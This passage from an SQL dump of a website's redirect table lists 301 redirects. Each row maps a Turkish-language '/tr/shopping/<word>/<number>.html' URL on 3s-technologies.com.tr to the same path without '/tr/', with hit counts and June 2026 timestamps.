04:40:45','0000-00-00 00:00:00',301),(72443,'https://3s-technologies.com.tr/tr/shopping/disrespectful/564836794.html',NULL,'https://3s-technologies.com.tr/shopping/disrespectful/564836794.html','',1,0,'2026-06-11 04:40:48','0000-00-00 00:00:00',301),(72444,'https://3s-technologies.com.tr/tr/shopping/phytotomidae/2503067470.html',NULL,'https://3s-technologies.com.tr/shopping/phytotomidae/2503067470.html','',1,0,'2026-06-11 04:40:51','0000-00-00 00:00:00',301),(72445,'https://3s-technologies.com.tr/tr/shopping/gumming/530707781.html',NULL,'https://3s-technologies.com.tr/shopping/gumming/530707781.html','',1,0,'2026-06-11 04:40:54','0000-00-00 00:00:00',301),(72446,'https://3s-technologies.com.tr/tr/shopping/jauntiness/4095342679.html',NULL,'https://3s-technologies.com.tr/shopping/jauntiness/4095342679.html','',1,0,'2026-06-11 04:40:57','0000-00-00 00:00:00',301),(72447,'https://3s-technologies.com.tr/tr/shopping/onthejob/684078274.html',NULL,'https://3s-technologies.com.tr/shopping/onthejob/684078274.html','',1,0,'2026-06-11 04:41:01','0000-00-00 00:00:00',301),(72448,'https://3s-technologies.com.tr/tr/shopping/expurgator/504618777.html',NULL,'https://3s-technologies.com.tr/shopping/expurgator/504618777.html','',1,0,'2026-06-11 04:41:04','0000-00-00 00:00:00',301),(72449,'https://3s-technologies.com.tr/tr/shopping/legerdemain/3417083641.html',NULL,'https://3s-technologies.com.tr/shopping/legerdemain/3417083641.html','',1,0,'2026-06-11 04:41:07','0000-00-00 00:00:00',301),(72450,'https://3s-technologies.com.tr/tr/shopping/mimotannic/3158422185.html',NULL,'https://3s-technologies.com.tr/shopping/mimotannic/3158422185.html','',1,0,'2026-06-11 04:41:10','0000-00-00 00:00:00',301),(72451,'https://3s-technologies.com.tr/tr/shopping/trifasciated/2203576483.html',NULL,'https://3s-technologies.com.tr/shopping/trifasciated/2203576483.html','',1,0,'2026-06-11 04:41:13','0000-00-00 00:00:00',301),(72452,'https://3s-technologies.com.tr/tr/shopping/nuncios/2665752992.html',NULL,'https://3s-technologies.com.tr/shopping/nuncios/2665752992.html','',1,0,'2026-06-11 04:41:16','0000-00-00 00:00:00',301),(72453,'https://3s-technologies.com.tr/tr/shopping/dichogamy/1870329721.html',NULL,'https://3s-technologies.com.tr/shopping/dichogamy/1870329721.html','',1,0,'2026-06-11 04:41:19','0000-00-00 00:00:00',301),(72454,'https://3s-technologies.com.tr/tr/shopping/melodrama/4185137588.html',NULL,'https://3s-technologies.com.tr/shopping/melodrama/4185137588.html','',1,0,'2026-06-11 04:41:22','0000-00-00 00:00:00',301),(72455,'https://3s-technologies.com.tr/tr/shopping/vaporimeter/1853581816.html',NULL,'https://3s-technologies.com.tr/shopping/vaporimeter/1853581816.html','',1,0,'2026-06-11 04:41:28','0000-00-00 00:00:00',301),(72456,'https://3s-technologies.com.tr/tr/shopping/vernaculous/2644857726.html',NULL,'https://3s-technologies.com.tr/shopping/vernaculous/2644857726.html','',1,0,'2026-06-11 04:41:30','0000-00-00 00:00:00',301),(72457,'https://3s-technologies.com.tr/tr/shopping/truculently/1454670033.html',NULL,'https://3s-technologies.com.tr/shopping/truculently/1454670033.html','',1,0,'2026-06-11 04:41:33','0000-00-00 00:00:00',301),(72458,'https://3s-technologies.com.tr/tr/shopping/swainmote/3570984536.html',NULL,'https://3s-technologies.com.tr/shopping/swainmote/3570984536.html','',1,0,'2026-06-11 04:41:36','0000-00-00 00:00:00',301),(72459,'https://3s-technologies.com.tr/tr/shopping/alectryomachy/439492700.html',NULL,'https://3s-technologies.com.tr/shopping/alectryomachy/439492700.html','',1,0,'2026-06-11 04:41:39','0000-00-00 00:00:00',301),(72460,'https://3s-technologies.com.tr/tr/shopping/sauterelle/1070197737.html',NULL,'https://3s-technologies.com.tr/shopping/sauterelle/1070197737.html','',1,0,'2026-06-11 04:41:42','0000-00-00 00:00:00',301),(72461,'https://3s-technologies.com.tr/tr/shopping/astrologian/680538062.html',NULL,'https://3s-technologies.com.tr/shopping/astrologian/680538062.html','',1,0,'2026-06-11 04:41:45','0000-00-00 00:00:00',301),(72462,'https://3s-technologies.com.tr/tr/shopping/zeolitic/4052755205.html',NULL,'https://3s-technologies.com.tr/shopping/zeolitic/4052755205.html','',1,0,'2026-06-11 04:41:48','0000-00-00 00:00:00',301),(72463,'https://3s-technologies.com.tr/tr/shopping/vassalage/3967731761.html',NULL,'https://3s-technologies.com.tr/shopping/vassalage/3967731761.html','',1,0,'2026-06-11 04:41:54','0000-00-00 00:00:00',301),(72464,'https://3s-technologies.com.tr/tr/shopping/franciscan/4181597392.html',NULL,'https://3s-technologies.com.tr/shopping/franciscan/4181597392.html','',1,0,'2026-06-11 04:41:57','0000-00-00 00:00:00',301),(72465,'https://3s-technologies.com.tr/tr/shopping/doorsill/924867269.html',NULL,'https://3s-technologies.com.tr/shopping/doorsill/924867269.html','',1,0,'2026-06-11 04:42:00','0000-00-00 00:00:00',301),(72466,'https://3s-technologies.com.tr/tr/shopping/convection/4013503932.html',NULL,'https://3s-technologies.com.tr/shopping/convection/4013503932.html','',1,0,'2026-06-11 04:42:03','0000-00-00 00:00:00',301),(72467,'https://3s-technologies.com.tr/tr/shopping/airway/2541759217.html',NULL,'https://3s-technologies.com.tr/shopping/airway/2541759217.html','',1,0,'2026-06-11 04:42:06','0000-00-00 00:00:00',301),(72468,'https://3s-technologies.com.tr/tr/shopping/imperceptibleness/2820335568.html',NULL,'https://3s-technologies.com.tr/shopping/imperceptibleness/2820335568.html','',1,0,'2026-06-11 04:42:09','0000-00-00 00:00:00',301),(72469,'https://3s-technologies.com.tr/tr/shopping/hobgoblin/3160846399.html',NULL,'https://3s-technologies.com.tr/shopping/hobgoblin/3160846399.html','',1,0,'2026-06-11 04:42:12','0000-00-00 00:00:00',301),(72470,'https://3s-technologies.com.tr/tr/shopping/woodhewer/1992947890.html',NULL,'https://3s-technologies.com.tr/shopping/woodhewer/1992947890.html','',1,0,'2026-06-11 04:42:15','0000-00-00 00:00:00',301),(72471,'https://3s-technologies.com.tr/tr/shopping/chrysanthemum/2939622424.html',NULL,'https://3s-technologies.com.tr/shopping/chrysanthemum/2939622424.html','',1,0,'2026-06-11 04:42:19','0000-00-00 00:00:00',301),(72472,'https://3s-technologies.com.tr/tr/shopping/deliveries/1183874067.html',NULL,'https://3s-technologies.com.tr/shopping/deliveries/1183874067.html','',1,0,'2026-06-11 04:42:21','0000-00-00 00:00:00',301),(72473,'https://3s-technologies.com.tr/tr/shopping/discontinuance/1706432100.html',NULL,'https://3s-technologies.com.tr/shopping/discontinuance/1706432100.html','',1,0,'2026-06-11 04:42:24','0000-00-00 00:00:00',301),(72474,'https://3s-technologies.com.tr/tr/shopping/dishevelling/4224945349.html',NULL,'https://3s-technologies.com.tr/shopping/dishevelling/4224945349.html','',1,0,'2026-06-11 04:42:27','0000-00-00 00:00:00',301),(72475,'https://3s-technologies.com.tr/tr/shopping/diminuendo/1322287650.html',NULL,'https://3s-technologies.com.tr/shopping/diminuendo/1322287650.html','',1,0,'2026-06-11 04:42:30','0000-00-00 00:00:00',301),(72476,'https://3s-technologies.com.tr/tr/shopping/cognisor/1290608873.html',NULL,'https://3s-technologies.com.tr/shopping/cognisor/1290608873.html','',1,0,'2026-06-11 04:42:33','0000-00-00 00:00:00',301),(72477,'https://3s-technologies.com.tr/tr/shopping/cymbalaria/3411282770.html',NULL,'https://3s-technologies.com.tr/shopping/cymbalaria/3411282770.html','',1,0,'2026-06-11 04:42:36','0000-00-00 00:00:00',301),(72478,'https://3s-technologies.com.tr/tr/shopping/dispossessor/1030389976.html',NULL,'https://3s-technologies.com.tr/shopping/dispossessor/1030389976.html','',1,0,'2026-06-11 04:42:39','0000-00-00 00:00:00',301),(72479,'https://3s-technologies.com.tr/tr/shopping/saturni/4220193054.html',NULL,'https://3s-technologies.com.tr/shopping/saturni/4220193054.html','',1,0,'2026-06-11 04:42:45','0000-00-00 00:00:00',301),(72480,'https://3s-technologies.com.tr/tr/shopping/cinchonaceous/4196691771.html',NULL,'https://3s-technologies.com.tr/shopping/cinchonaceous/4196691771.html','',1,0,'2026-06-11 04:42:47','0000-00-00 00:00:00',301),(72481,'https://3s-technologies.com.tr/tr/shopping/aleknight/3884661761.html',NULL,'https://3s-technologies.com.tr/shopping/aleknight/3884661761.html','',1,0,'2026-06-11 04:42:50','0000-00-00 00:00:00',301),(72482,'https://3s-technologies.com.tr/tr/shopping/trica/164712912.html',NULL,'https://3s-technologies.com.tr/shopping/trica/164712912.html','',1,0,'2026-06-11 04:42:53','0000-00-00 00:00:00',301),(72483,'https://3s-technologies.com.tr/tr/shopping/cotemporaries/4043183825.html',NULL,'https://3s-technologies.com.tr/shopping/cotemporaries/4043183825.html','',1,0,'2026-06-11 04:42:56','0000-00-00 00:00:00',301),(72484,'https://3s-technologies.com.tr/tr/shopping/pentateuchal/2608986180.html',NULL,'https://3s-technologies.com.tr/shopping/pentateuchal/2608986180.html','',1,0,'2026-06-11 04:42:59','0000-00-00 00:00:00',301),(72485,'https://3s-technologies.com.tr/tr/shopping/waldheimia/3709398103.html',NULL,'https://3s-technologies.com.tr/shopping/waldheimia/3709398103.html','',1,0,'2026-06-11 04:43:02','0000-00-00 00:00:00',301),(72486,'https://3s-technologies.com.tr/tr/shopping/haematemesis/3764585921.html',NULL,'https://3s-technologies.com.tr/shopping/haematemesis/3764585921.html','',1,0,'2026-06-11 04:43:05','0000-00-00 00:00:00',301),(72487,'https://3s-technologies.com.tr/tr/shopping/immortelle/1770118867.html',NULL,'https://3s-technologies.com.tr/shopping/immortelle/1770118867.html','',1,0,'2026-06-11 04:43:13','0000-00-00 00:00:00',301),(72488,'https://3s-technologies.com.tr/tr/shopping/acetylacrylic/2395120549.html',NULL,'https://3s-technologies.com.tr/shopping/acetylacrylic/2395120549.html','',1,0,'2026-06-11 04:43:15','0000-00-00 00:00:00',301),(72489,'https://3s-technologies.com.tr/tr/shopping/incredulous/1027965794.html',NULL,'https://3s-technologies.com.tr/shopping/incredulous/1027965794.html','',1,0,'2026-06-11 04:43:18','0000-00-00 00:00:00',301),(72490,'https://3s-technologies.com.tr/tr/shopping/chromatoscope/811708330.html',NULL,'https://3s-technologies.com.tr/shopping/chromatoscope/811708330.html','',1,0,'2026-06-11 04:43:21','0000-00-00 00:00:00',301),(72491,'https://3s-technologies.com.tr/tr/shopping/brandish/3253186020.html',NULL,'https://3s-technologies.com.tr/shopping/brandish/3253186020.html','',1,0,'2026-06-11 04:43:24','0000-00-00 00:00:00',301),(72492,'https://3s-technologies.com.tr/tr/shopping/homologue/2594662473.html',NULL,'https://3s-technologies.com.tr/shopping/homologue/2594662473.html','',1,0,'2026-06-11 04:43:27','0000-00-00 00:00:00',301),(72493,'https://3s-technologies.com.tr/tr/shopping/taxon/1359047967.html',NULL,'https://3s-technologies.com.tr/shopping/taxon/1359047967.html','',1,0,'2026-06-11 04:43:30','0000-00-00 00:00:00',301),(72494,'https://3s-technologies.com.tr/tr/shopping/somniatory/2516786211.html',NULL,'https://3s-technologies.com.tr/shopping/somniatory/2516786211.html','',1,0,'2026-06-11 04:43:33','0000-00-00 00:00:00',301),(72495,'https://3s-technologies.com.tr/tr/shopping/villanous/1942145504.html',NULL,'https://3s-technologies.com.tr/shopping/villanous/1942145504.html','',1,0,'2026-06-11 04:43:36','0000-00-00 00:00:00',301),(72496,'https://3s-technologies.com.tr/tr/shopping/hydrachnidae/1573140809.html',NULL,'https://3s-technologies.com.tr/shopping/hydrachnidae/1573140809.html','',1,0,'2026-06-11 04:43:39','0000-00-00 00:00:00',301),(72497,'https://3s-technologies.com.tr/tr/shopping/misdeal/3185559765.html',NULL,'https://3s-technologies.com.tr/shopping/misdeal/3185559765.html','',1,0,'2026-06-11 04:43:42','0000-00-00 00:00:00',301),(72498,'https://3s-technologies.com.tr/tr/shopping/lintie/3247221610.html',NULL,'https://3s-technologies.com.tr/shopping/lintie/3247221610.html','',1,0,'2026-06-11 04:43:45','0000-00-00 00:00:00',301),(72499,'https://3s-technologies.com.tr/tr/shopping/porphyria/2350560493.html',NULL,'https://3s-technologies.com.tr/shopping/porphyria/2350560493.html','',1,0,'2026-06-11 04:43:48','0000-00-00 00:00:00',301),(72500,'https://3s-technologies.com.tr/tr/shopping/depraver/3162058498.html',NULL,'https://3s-technologies.com.tr/shopping/depraver/3162058498.html','',1,0,'2026-06-11 04:43:51','0000-00-00 00:00:00',301),(72501,'https://3s-technologies.com.tr/tr/shopping/heteromyaria/1923233009.html',NULL,'https://3s-technologies.com.tr/shopping/heteromyaria/1923233009.html','',1,0,'2026-06-11 04:43:54','0000-00-00 00:00:00',301),(72502,'https://3s-technologies.com.tr/tr/shopping/sowins/4103721114.html',NULL,'https://3s-technologies.com.tr/shopping/sowins/4103721114.html','',1,0,'2026-06-11 04:43:57','0000-00-00 00:00:00',301),(72503,'https://3s-technologies.com.tr/tr/shopping/unappealably/1689684195.html',NULL,'https://3s-technologies.com.tr/shopping/unappealably/1689684195.html','',1,0,'2026-06-11 04:44:28','0000-00-00 00:00:00',301),(72504,'https://3s-technologies.com.tr/tr/shopping/theanthropic/451488278.html',NULL,'https://3s-technologies.com.tr/shopping/theanthropic/451488278.html','',1,0,'2026-06-11 04:44:33','0000-00-00 00:00:00',301),(72505,'https://3s-technologies.com.tr/tr/shopping/ministral/996942644.html',NULL,'https://3s-technologies.com.tr/shopping/ministral/996942644.html','',1,0,'2026-06-11 04:44:36','0000-00-00 00:00:00',301),(72506,'https://3s-technologies.com.tr/tr/shopping/exordiums/1252572769.html',NULL,'https://3s-technologies.com.tr/shopping/exordiums/1252572769.html','',1,0,'2026-06-11 04:44:39','0000-00-00 00:00:00',301),(72507,'https://3s-technologies.com.tr/tr/shopping/petromastoid/1212505384.html',NULL,'https://3s-technologies.com.tr/shopping/petromastoid/1212505384.html','',1,0,'2026-06-11 04:44:42','0000-00-00 00:00:00',301),(72508,'https://3s-technologies.com.tr/tr/shopping/heliangelos/3279882189.html',NULL,'https://3s-technologies.com.tr/shopping/heliangelos/3279882189.html','',1,0,'2026-06-11 04:44:45','0000-00-00 00:00:00',301),(72509,'https://3s-technologies.com.tr/tr/shopping/begrudged/1172483439.html',NULL,'https://3s-technologies.com.tr/shopping/begrudged/1172483439.html','',1,0,'2026-06-11 04:44:48','0000-00-00 00:00:00',301),(72510,'https://3s-technologies.com.tr/tr/shopping/iberomesornis/3891838270.html',NULL,'https://3s-technologies.com.tr/shopping/iberomesornis/3891838270.html','',1,0,'2026-06-11 04:44:51','0000-00-00 00:00:00',301),(72511,'https://3s-technologies.com.tr/tr/shopping/mesorhine/3274081286.html',NULL,'https://3s-technologies.com.tr/shopping/mesorhine/3274081286.html','',1,0,'2026-06-11 04:44:56','0000-00-00 00:00:00',301),(72512,'https://3s-technologies.com.tr/tr/shopping/kerseynette/2346578838.html',NULL,'https://3s-technologies.com.tr/shopping/kerseynette/2346578838.html','',1,0,'2026-06-11 04:44:59','0000-00-00 00:00:00',301),(72513,'https://3s-technologies.com.tr/tr/shopping/chansonnettes/2162556639.html',NULL,'https://3s-technologies.com.tr/shopping/chansonnettes/2162556639.html','',1,0,'2026-06-11 04:45:02','0000-00-00 00:00:00',301),(72514,'https://3s-technologies.com.tr/tr/shopping/rosselly/2570390518.html',NULL,'https://3s-technologies.com.tr/shopping/rosselly/2570390518.html','',1,0,'2026-06-11 04:45:05','0000-00-00 00:00:00',301),(72515,'https://3s-technologies.com.tr/tr/shopping/oilery/1598624879.html',NULL,'https://3s-technologies.com.tr/shopping/oilery/1598624879.html','',1,0,'2026-06-11 04:45:08','0000-00-00 00:00:00',301),(72516,'https://3s-technologies.com.tr/tr/shopping/gunjah/773899453.html',NULL,'https://3s-technologies.com.tr/shopping/gunjah/773899453.html','',1,0,'2026-06-11 04:45:11','0000-00-00 00:00:00',301),(72517,'https://3s-technologies.com.tr/tr/shopping/lawrencium/3153488055.html',NULL,'https://3s-technologies.com.tr/shopping/lawrencium/3153488055.html','',1,0,'2026-06-11 04:45:14','0000-00-00 00:00:00',301),(72518,'https://3s-technologies.com.tr/tr/shopping/epiplastra/3644272010.html',NULL,'https://3s-technologies.com.tr/shopping/epiplastra/3644272010.html','',1,0,'2026-06-11 04:45:17','0000-00-00 00:00:00',301),(72519,'https://3s-technologies.com.tr/tr/shopping/nonage/1676361473.html',NULL,'https://3s-technologies.com.tr/shopping/nonage/1676361473.html','',1,0,'2026-06-11 04:45:22','0000-00-00 00:00:00',301),(72520,'https://3s-technologies.com.tr/tr/shopping/scarlatinous/1046696454.html',NULL,'https://3s-technologies.com.tr/shopping/scarlatinous/1046696454.html','',1,0,'2026-06-11 04:45:25','0000-00-00 00:00:00',301),(72521,'https://3s-technologies.com.tr/tr/shopping/unbridledness/1233842093.html',NULL,'https://3s-technologies.com.tr/shopping/unbridledness/1233842093.html','',1,0,'2026-06-11 04:45:28','0000-00-00 00:00:00',301),(72522,'https://3s-technologies.com.tr/tr/shopping/tritium/2610198279.html',NULL,'https://3s-technologies.com.tr/shopping/tritium/2610198279.html','',1,0,'2026-06-11 04:45:31','0000-00-00 00:00:00',301),(72523,'https://3s-technologies.com.tr/tr/shopping/submissness/1525369770.html',NULL,'https://3s-technologies.com.tr/shopping/submissness/1525369770.html','',1,0,'2026-06-11 04:45:34','0000-00-00 00:00:00',301),(72524,'https://3s-technologies.com.tr/tr/shopping/irreconcilableness/1705220017.html',NULL,'https://3s-technologies.com.tr/shopping/irreconcilableness/1705220017.html','',1,0,'2026-06-11 04:45:37','0000-00-00 00:00:00',301),(72525,'https://3s-technologies.com.tr/tr/shopping/hyphantornis/3959506660.html',NULL,'https://3s-technologies.com.tr/shopping/hyphantornis/3959506660.html','',1,0,'2026-06-11 04:45:40','0000-00-00 00:00:00',301),(72526,'https://3s-technologies.com.tr/tr/shopping/thiophenic/4256228107.html',NULL,'https://3s-technologies.com.tr/shopping/thiophenic/4256228107.html','',1,0,'2026-06-11 04:45:43','0000-00-00 00:00:00',301),(72527,'https://3s-technologies.com.tr/tr/shopping/marsipobranchiata/4235939974.html',NULL,'https://3s-technologies.com.tr/shopping/marsipobranchiata/4235939974.html','',1,0,'2026-06-11 04:46:08','0000-00-00 00:00:00',301),(72528,'https://3s-technologies.com.tr/tr/shopping/thespian/1646895764.html',NULL,'https://3s-technologies.com.tr/shopping/thespian/1646895764.html','',1,0,'2026-06-11 04:46:13','0000-00-00 00:00:00',301),(72529,'https://3s-technologies.com.tr/tr/shopping/antinomian/3111092589.html',NULL,'https://3s-technologies.com.tr/shopping/antinomian/3111092589.html','',1,0,'2026-06-11 04:46:16','0000-00-00 00:00:00',301),(72530,'https://3s-technologies.com.tr/tr/shopping/helminthology/387541919.html',NULL,'https://3s-technologies.com.tr/shopping/helminthology/387541919.html','',1,0,'2026-06-11 04:46:19','0000-00-00 00:00:00',301),(72531,'https://3s-technologies.com.tr/tr/shopping/patriarchism/2421423753.html',NULL,'https://3s-technologies.com.tr/shopping/patriarchism/2421423753.html','',1,0,'2026-06-11 04:46:22','0000-00-00 00:00:00',301),(72532,'https://3s-technologies.com.tr/tr/shopping/lithotritist/2044127999.html',NULL,'https://3s-technologies.com.tr/shopping/lithotritist/2044127999.html','',1,0,'2026-06-11 04:46:25','0000-00-00 00:00:00',301),(72533,'https://3s-technologies.com.tr/tr/shopping/jobbernowl/3881285072.html',NULL,'https://3s-technologies.com.tr/shopping/jobbernowl/3881285072.html','',1,0,'2026-06-11 04:46:28','0000-00-00 00:00:00',301),(72534,'https://3s-technologies.com.tr/tr/shopping/greatgrandson/4293707755.html',NULL,'https://3s-technologies.com.tr/shopping/greatgrandson/4293707755.html','',1,0,'2026-06-11 04:46:31','0000-00-00 00:00:00',301),(72535,'https://3s-technologies.com.tr/tr/shopping/dispassionate/1724739661.html',NULL,'https://3s-technologies.com.tr/shopping/dispassionate/1724739661.html','',1,0,'2026-06-11 04:46:34','0000-00-00 00:00:00',301),(72536,'https://3s-technologies.com.tr/tr/shopping/judahite/3951984809.html',NULL,'https://3s-technologies.com.tr/shopping/judahite/3951984809.html','',1,0,'2026-06-11 04:46:37','0000-00-00 00:00:00',301),(72537,'https://3s-technologies.com.tr/tr/shopping/aurochloride/3814946880.html',NULL,'https://3s-technologies.com.tr/shopping/aurochloride/3814946880.html','',1,0,'2026-06-11 04:46:40','0000-00-00 00:00:00',301),(72538,'https://3s-technologies.com.tr/tr/shopping/haemodromometerdromometern/4183925505.html',NULL,'https://3s-technologies.com.tr/shopping/haemodromometerdromometern/4183925505.html','',1,0,'2026-06-11 04:46:43','0000-00-00 00:00:00',301),(72539,'https://3s-technologies.com.tr/tr/shopping/sonsinlaw/1830262368.html',NULL,'https://3s-technologies.com.tr/shopping/sonsinlaw/1830262368.html','',1,0,'2026-06-11 04:46:46','0000-00-00 00:00:00',301),(72540,'https://3s-technologies.com.tr/tr/shopping/tamoxifen/2669129681.html',NULL,'https://3s-technologies.com.tr/shopping/tamoxifen/2669129681.html','',1,0,'2026-06-11 04:46:49','0000-00-00 00:00:00',301),(72541,'https://3s-technologies.com.tr/tr/shopping/tidology/3662743078.html',NULL,'https://3s-technologies.com.tr/shopping/tidology/3662743078.html','',1,0,'2026-06-11 04:46:52','0000-00-00 00:00:00',301),(72542,'https://3s-technologies.com.tr/tr/shopping/pigeonfoot/4197903870.html',NULL,'https://3s-technologies.com.tr/shopping/pigeonfoot/4197903870.html','',1,0,'2026-06-11 04:46:55','0000-00-00 00:00:00',301),(72543,'https://3s-technologies.com.tr/tr/shopping/cajolement/3082624795.html',NULL,'https://3s-technologies.com.tr/shopping/cajolement/3082624795.html','',1,0,'2026-06-11 04:47:03','0000-00-00 00:00:00',301),(72544,'https://3s-technologies.com.tr/tr/shopping/lombardeer/3840265212.html',NULL,'https://3s-technologies.com.tr/shopping/lombardeer/3840265212.html','',1,0,'2026-06-11 04:47:08','0000-00-00 00:00:00',301),(72545,'https://3s-technologies.com.tr/tr/shopping/collyricincla/1967463836.html',NULL,'https://3s-technologies.com.tr/shopping/collyricincla/1967463836.html','',1,0,'2026-06-11 04:47:11','0000-00-00 00:00:00',301),(72546,'https://3s-technologies.com.tr/tr/shopping/inconsumptible/799824918.html',NULL,'https://3s-technologies.com.tr/shopping/inconsumptible/799824918.html','',1,0,'2026-06-11 04:47:14','0000-00-00 00:00:00',301),(72547,'https://3s-technologies.com.tr/tr/shopping/cruelties/2718353073.html',NULL,'https://3s-technologies.com.tr/shopping/cruelties/2718353073.html','',1,0,'2026-06-11 04:47:17','0000-00-00 00:00:00',301),(72548,'https://3s-technologies.com.tr/tr/shopping/thermochrosy/3751630078.html',NULL,'https://3s-technologies.com.tr/shopping/thermochrosy/3751630078.html','',1,0,'2026-06-11 04:47:20','0000-00-00 00:00:00',301),(72549,'https://3s-technologies.com.tr/tr/shopping/aeroplanist/2569178419.html',NULL,'https://3s-technologies.com.tr/shopping/aeroplanist/2569178419.html','',1,0,'2026-06-11 04:47:23','0000-00-00 00:00:00',301),(72550,'https://3s-technologies.com.tr/tr/shopping/nibelungenlied/880470736.html',NULL,'https://3s-technologies.com.tr/shopping/nibelungenlied/880470736.html','',1,0,'2026-06-11 04:47:26','0000-00-00 00:00:00',301),(72551,'https://3s-technologies.com.tr/tr/shopping/pleurogrammus/242211451.html',NULL,'https://3s-technologies.com.tr/shopping/pleurogrammus/242211451.html','',1,0,'2026-06-11 04:47:33','0000-00-00 00:00:00',301),(72552,'https://3s-technologies.com.tr/tr/shopping/birdstongue/829668350.html',NULL,'https://3s-technologies.com.tr/shopping/birdstongue/829668350.html','',1,0,'2026-06-11 04:47:35','0000-00-00 00:00:00',301),(72553,'https://3s-technologies.com.tr/tr/shopping/cosmopolitism/954710701.html',NULL,'https://3s-technologies.com.tr/shopping/cosmopolitism/954710701.html','',1,0,'2026-06-11 04:47:38','0000-00-00 00:00:00',301),(72554,'https://3s-technologies.com.tr/tr/shopping/sesamum/2505232060.html',NULL,'https://3s-technologies.com.tr/shopping/sesamum/2505232060.html','',1,0,'2026-06-11 04:47:41','0000-00-00 00:00:00',301),(72555,'https://3s-technologies.com.tr/tr/shopping/legerdemainist/186656754.html',NULL,'https://3s-technologies.com.tr/shopping/legerdemainist/186656754.html','',1,0,'2026-06-11 04:47:44','0000-00-00 00:00:00',301),(72556,'https://3s-technologies.com.tr/tr/shopping/abacura/1142854223.html',NULL,'https://3s-technologies.com.tr/shopping/abacura/1142854223.html','',1,0,'2026-06-11 04:47:47','0000-00-00 00:00:00',301),(72557,'https://3s-technologies.com.tr/tr/shopping/antiscorbutic/456077066.html',NULL,'https://3s-technologies.com.tr/shopping/antiscorbutic/456077066.html','',1,0,'2026-06-11 04:47:50','0000-00-00 00:00:00',301),(72558,'https://3s-technologies.com.tr/tr/shopping/battening/2285434400.html',NULL,'https://3s-technologies.com.tr/shopping/battening/2285434400.html','',1,0,'2026-06-11 04:47:53','0000-00-00 00:00:00',301),(72559,'https://3s-technologies.com.tr/tr/shopping/greekess/1726115267.html',NULL,'https://3s-technologies.com.tr/shopping/greekess/1726115267.html','',1,0,'2026-06-11 04:48:07','0000-00-00 00:00:00',301),(72560,'https://3s-technologies.com.tr/tr/shopping/hairbrush/1869117622.html',NULL,'https://3s-technologies.com.tr/shopping/hairbrush/1869117622.html','',1,0,'2026-06-11 04:48:11','0000-00-00 00:00:00',301),(72561,'https://3s-technologies.com.tr/tr/shopping/sulphuretted/2345366739.html',NULL,'https://3s-technologies.com.tr/shopping/sulphuretted/2345366739.html','',1,0,'2026-06-11 04:48:14','0000-00-00 00:00:00',301),(72562,'https://3s-technologies.com.tr/tr/shopping/boatshaped/2819123469.html',NULL,'https://3s-technologies.com.tr/shopping/boatshaped/2819123469.html','',1,0,'2026-06-11 04:48:17','0000-00-00 00:00:00',301),(72563,'https://3s-technologies.com.tr/tr/shopping/chlorura/1984818874.html',NULL,'https://3s-technologies.com.tr/shopping/chlorura/1984818874.html','',1,0,'2026-06-11 04:48:20','0000-00-00 00:00:00',301),(72564,'https://3s-technologies.com.tr/tr/shopping/unoriginated/3846066083.html',NULL,'https://3s-technologies.com.tr/shopping/unoriginated/3846066083.html','',1,0,'2026-06-11 04:48:23','0000-00-00 00:00:00',301),(72565,'https://3s-technologies.com.tr/tr/shopping/uniradiated/3725704581.html',NULL,'https://3s-technologies.com.tr/shopping/uniradiated/3725704581.html','',1,0,'2026-06-11 04:48:25','0000-00-00 00:00:00',301),(72566,'https://3s-technologies.com.tr/tr/shopping/internationalise/1829050269.html',NULL,'https://3s-technologies.com.tr/shopping/internationalise/1829050269.html','',1,0,'2026-06-11 04:48:29','0000-00-00 00:00:00',301),(72567,'https://3s-technologies.com.tr/tr/shopping/waterman/2751800389.html',NULL,'https://3s-technologies.com.tr/shopping/waterman/2751800389.html','',1,0,'2026-06-11 04:48:34','0000-00-00 00:00:00',301),(72568,'https://3s-technologies.com.tr/tr/shopping/symptomatology/2143126754.html',NULL,'https://3s-technologies.com.tr/shopping/symptomatology/2143126754.html','',1,0,'2026-06-11 04:48:36','0000-00-00 00:00:00',301),(72569,'https://3s-technologies.com.tr/tr/shopping/draperies/1438363539.html',NULL,'https://3s-technologies.com.tr/shopping/draperies/1438363539.html','',1,0,'2026-06-11 04:48:39','0000-00-00 00:00:00',301),(72570,'https://3s-technologies.com.tr/tr/shopping/calamita/1601212584.html',NULL,'https://3s-technologies.com.tr/shopping/calamita/1601212584.html','',1,0,'2026-06-11 04:48:42','0000-00-00 00:00:00',301),(72571,'https://3s-technologies.com.tr/tr/shopping/unlatched/2681125275.html',NULL,'https://3s-technologies.com.tr/shopping/unlatched/2681125275.html','',1,0,'2026-06-11 04:48:45','0000-00-00 00:00:00',301),(72572,'https://3s-technologies.com.tr/tr/shopping/caelatura/1431187030.html',NULL,'https://3s-technologies.com.tr/shopping/caelatura/1431187030.html','',1,0,'2026-06-11 04:48:48','0000-00-00 00:00:00',301),(72573,'https://3s-technologies.com.tr/tr/shopping/filature/503406678.html',NULL,'https://3s-technologies.com.tr/shopping/filature/503406678.html','',1,0,'2026-06-11 04:48:51','0000-00-00 00:00:00',301),(72574,'https://3s-technologies.com.tr/tr/shopping/kalif/1872494311.html',NULL,'https://3s-technologies.com.tr/shopping/kalif/1872494311.html','',1,0,'2026-06-11 04:48:54','0000-00-00 00:00:00',301),(72575,'https://3s-technologies.com.tr/tr/shopping/blackfordi/3521394249.html',NULL,'https://3s-technologies.com.tr/shopping/blackfordi/3521394249.html','',1,0,'2026-06-11 04:49:02','0000-00-00 00:00:00',301),(72576,'https://3s-technologies.com.tr/tr/shopping/gypsoplast/1556392904.html',NULL,'https://3s-technologies.com.tr/shopping/gypsoplast/1556392904.html','',1,0,'2026-06-11 04:49:06','0000-00-00 00:00:00',301),(72577,'https://3s-technologies.com.tr/tr/shopping/citywide/1357931953.html',NULL,'https://3s-technologies.com.tr/shopping/citywide/1357931953.html','',1,0,'2026-06-11 04:49:09','0000-00-00 00:00:00',301),(72578,'https://3s-technologies.com.tr/tr/shopping/manufacturers/417385319.html',NULL,'https://3s-technologies.com.tr/shopping/manufacturers/417385319.html','',1,0,'2026-06-11 04:49:12','0000-00-00 00:00:00',301),(72579,'https://3s-technologies.com.tr/tr/shopping/revengeance/1047908553.html',NULL,'https://3s-technologies.com.tr/shopping/revengeance/1047908553.html','',1,0,'2026-06-11 04:49:15','0000-00-00 00:00:00',301),(72580,'https://3s-technologies.com.tr/tr/shopping/calcarine/276643639.html',NULL,'https://3s-technologies.com.tr/shopping/calcarine/276643639.html','',1,0,'2026-06-11 04:49:18','0000-00-00 